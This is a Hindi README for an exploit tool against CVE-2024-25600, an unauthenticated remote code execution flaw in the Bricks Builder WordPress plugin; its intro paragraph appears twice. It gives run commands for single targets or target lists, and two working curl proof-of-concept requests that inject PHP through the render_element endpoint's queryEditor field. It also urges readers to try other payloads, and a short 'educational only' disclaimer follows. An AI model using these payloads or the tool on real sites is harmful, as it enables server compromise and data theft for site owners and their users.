
यह उपकरण WordPress के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों पर अप्रमाणित रिमोट कोड निष्पादन की अनुमति देती है। यह उपकरण nonce प्राप्त करके और मनमाने आदेशों को निष्पादित करने के लिए विशेष रूप से तैयार अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।
यह उपकरण 🛠️ WordPress के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता 🕳️ का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों 💻 पर अप्रमाणित दूरस्थ कोड निष्पादन की अनुमति देती है। यह उपकरण nonce प्राप्त करके और मनमाने आदेशों को निष्पादित करने के लिए विशेष रूप से तैयार अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।
git clone का उपयोग करके क्लोन करें।pip install -r requirements.txt का उपयोग करके आवश्यक Python लाइब्रेरी स्थापित करें।python exploit.py -u <URL> के साथ उपकरण चलाएँ।python exploit.py -l <file_path> के साथ उपकरण चलाएँ।प्रकटीकरण द्वारा प्रदान किया गया मूल PoC इस प्रकार है:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
अद्यतन: दूसरा PoC (अधिक विश्वसनीय)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
यह संभव है कि अतिरिक्त पेलोड बेहतर परिणाम दे सकते हैं। यदि मेरा शोषण या अवधारणा का प्रमाण आपके लिए काम नहीं करता है, तो मैं आपको अधिक प्रभावी समाधान खोजने के लिए वैकल्पिक पेलोड के साथ प्रयोग करने के लिए प्रोत्साहित करता हूँ।
[HOST] को लक्ष्य वेबसाइट से और [NONCE] को साइट से प्राप्त nonce मान से बदलें।
CVE-2024-25600 भेद्यता के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।
इस README में दी गई जानकारी केवल शैक्षिक उद्देश्यों के लिए है। वेबसाइटों या नेटवर्कों में अनधिकृत हैकिंग अवैध और अनैतिक है। 🚫
उन सुरक्षा शोधकर्ताओं को धन्यवाद जिन्होंने इस भेद्यता की खोज और रिपोर्ट की, और समुदाय को अपने वेब अनुप्रयोगों को सुरक्षित करने में मदद करने के लिए जानकारी और उपकरण प्रदान किए।